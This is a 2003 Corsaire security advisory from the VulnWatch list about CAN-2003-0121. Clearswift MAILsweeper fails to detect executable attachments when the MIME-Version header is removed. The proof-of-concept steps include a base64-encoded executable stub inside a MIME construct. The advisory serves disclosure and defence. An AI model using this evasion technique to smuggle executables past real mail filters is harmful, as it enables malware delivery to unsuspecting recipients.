[VulnWatch] Corsaire Security Advisory - Clearswift MAILsweeper MIME attachme nt evasion issue

From: Martin O'Neal (VulnWatch@corsaire.com)
Date: 03/07/03

  • Next message: Steve: "[VulnWatch] Etnereal Advisory (Guninski #60)"
    From: Martin O'Neal <VulnWatch@corsaire.com>
    To: vulnwatch@vulnwatch.org
    Date: Fri, 7 Mar 2003 18:59:27 -0000
    
    

    -- Corsaire Security Advisory --

    Title: Clearswift MAILsweeper MIME attachment evasion issue
    Date: 03.03.03
    Application: Clearswift MAILsweeper 4.x
    Environment: Windows NT 4.0, Windows 2000,
    Author: Martin O'Neal [martin.oneal@corsaire.com]
    Audience: General distribution

    -- Scope --

    The aim of this document is to clearly define a MIME attachment evasion
    issue in the MAILsweeper product, as supplied by Clearswift Ltd. [1]

    -- History --

    Vendor notified: 03.03.03
    Uncoordinated vendor advisory released: 05.03.03
    Document released: 06.03.03

    Unfortunately the release of this advisory has not followed a
    particularly smooth path. The main reason for the rapid release schedule
    is due to an uncoordinated and unattributed advisory from Clearswift,
    released under their ThreatLab banner. Once this was made public, there
    seemed little point in delaying publishing the Corsaire advisory.

    For the record, the sole response we have had from Clearswift in regard
    to this issue has been an apology from Pete Simpson (ThreatLab Manager)
    for the unattributed release (received after we complained about the
    omission). Other than this, no one from Clearswift has responded to the
    original advisory, or any of the follow-up emails.

    -- Overview --

    The MAILsweeper product provides policy based, email content security
    functionality. Part of this functionality allows the product to block
    attachments based on their specific content type.

    However, by using malformed MIME encapsulation techniques this
    functionality can be evaded.

    -- Analysis --

    The attachment detection functionality works by recursively analysing
    the email message body and attachments for container constructs (such as
    MIME), decoding these and then comparing the contents against a
    predefined policy.

    If a deliberately malformed MIME encapsulation technique is used, then
    the MAILsweeper product will not recognise the attachment and allows it
    to pass unhindered.

    However, not all client applications require strict standards compliance
    and some will happily accept and process the malformed attachment.

    -- Proof of concept --

    For this proof of concept, the MIME encapsulation is simply modified to
    remove the MIME-Version header field. An example of an application that
    will process a MIME construct that is malformed in this way is Microsoft
    Internet Explorer.

    Whilst RFC2045 states that all agents must include this field [2] it
    then goes on to say that "In the absence of a MIME-Version field, a
    receiving mail user agent (whether conforming to MIME requirements or
    not) may optionally choose to interpret the body of the message
    according to local conventions."

    Step 1: On the MAILsweeper host create a new Data Type Manager with only
    the Executable type selected. Save and restart the MAILsweeper Security
    service.

    Step 2: Now create a text file that will be used to hold the MIME
    encoded attachment. Start notepad (or another text editor), and paste
    in:

         MIME-Version: 1.0
         Content-Location:file:///executable.exe
         Content-Transfer-Encoding: base64

         TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAC4AQCO2I0WAgC0Cc0huCBMzSFFeGUhJCQJALH/
         /////wAAAAAAAFQBAAAAAAIAUkKL6IzABRAADh+jBAADB
         gwAjsCLDgYAi/lPi/f986RQuDQAUMuMw4zYSI7YjsC/Dw
         C5EACw//OuR4v3i8NIjsC/DwCxBIvG99DT6IzaK9BzBIz
         YK9LT4APwjtqLx/fQ0+iMwivQcwSMwCvS0+AD+I7CrIrQ
         Tq2LyEaKwiT+PLB1BazzqusGPLJ1bfOkisKoAXSxvjIBD
         h+LHgQA/DPSrYvI4xOLwgPDjsCti/iD//90ESYBHeLzgf
         oA8HQWgcIAEOvcjMBAjsCD7xAmAR1IjsDr4ovDiz4IAIs
         2CgAD8AEGAgAtEACO2I7AuwAA+o7Wi+f7i8Uu/y+0QLsC
         ALkWAIzKjtq6HAHNIbj/TM0hUGFja2VkIGZpbGUgaXMgY
         29ycnVwdAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
         AAAAAAAAA=

    Step 3: To reproduce this issue, send an email containing the attachment
    created in step 2 that will be processed by the scenario from step 1.
    This should result in a successful discovery condition.

    Step 4: Reopen the attachment from step 2 and remove the first line
    (MIME-Version: 1.0), then resend the attachment as per step 3. This
    should result in the attachment not being spotted as an executable.

    -- Recommendations --

    To be an effective tool, the MAILsweeper product must not only be able
    to process encoding techniques implemented as per the relevant standard,
    but also common misinterpretations.

    As an ongoing process, a study project should be undertaken by
    Clearswift to identify applications that routinely decode MIME objects
    and have a liberal interpretation of the MIME standard.

    In response to this advisory, Clearswift have produced an updated script
    utility that can detect the malformed MIME header used in this example
    [3]. This should be implemented until a more permanent solution is
    forthcoming.

    -- CVE --

    The Common Vulnerabilities and Exposures (CVE) project has assigned
    the name CAN-2003-0121 to this issue. This is a candidate for
    inclusion in the CVE list (http://cve.mitre.org), which standardizes
    names for security problems.

    -- References --

    [1] http://www.clearswift.com
    [2] http://www.rfc.net/rfc2045.html#s4.
    [3] http://www.clearswift.com/support/threatlab/vbstool.asp

    -- Revision --

    a. Initial release.
    b. Minor revision.
    c. Added CVE reference.
    d. Added Clearswift script tool reference.

    -- Distribution --

    This security advisory may be freely distributed, provided that it
    remains unaltered and in its original form.

    -- Disclaimer --

    The information contained within this advisory is supplied "as-is" with
    no warranties or guarantees of fitness of use or otherwise. Corsaire
    accepts no responsibility for any damage caused by the use or misuse of
    this information.

    Copyright 2003 Corsaire Limited. All rights reserved.

    ----------------------------------------------------------------------
    CONFIDENTIALITY: This e-mail and any files transmitted with it are
    confidential and intended solely for the use of the recipient(s) only.
    Any review, retransmission, dissemination or other use of, or taking
    any action in reliance upon this information by persons or entities
    other than the intended recipient(s) is prohibited. If you have
    received this e-mail in error please notify the sender immediately
    and destroy the material whether stored on a computer or otherwise.
    ----------------------------------------------------------------------
    DISCLAIMER: Any views or opinions presented within this e-mail are
    solely those of the author and do not necessarily represent those
    of Corsaire Limited, unless otherwise specifically stated.
    ----------------------------------------------------------------------
    Corsaire Limited, 3 Tannery House, Tannery Lane, Send, Surrey, GU23 7EF
    Telephone: +44(0)1483-226000 Email:info@corsaire.com


  • Next message: Steve: "[VulnWatch] Etnereal Advisory (Guninski #60)"

    Relevant Pages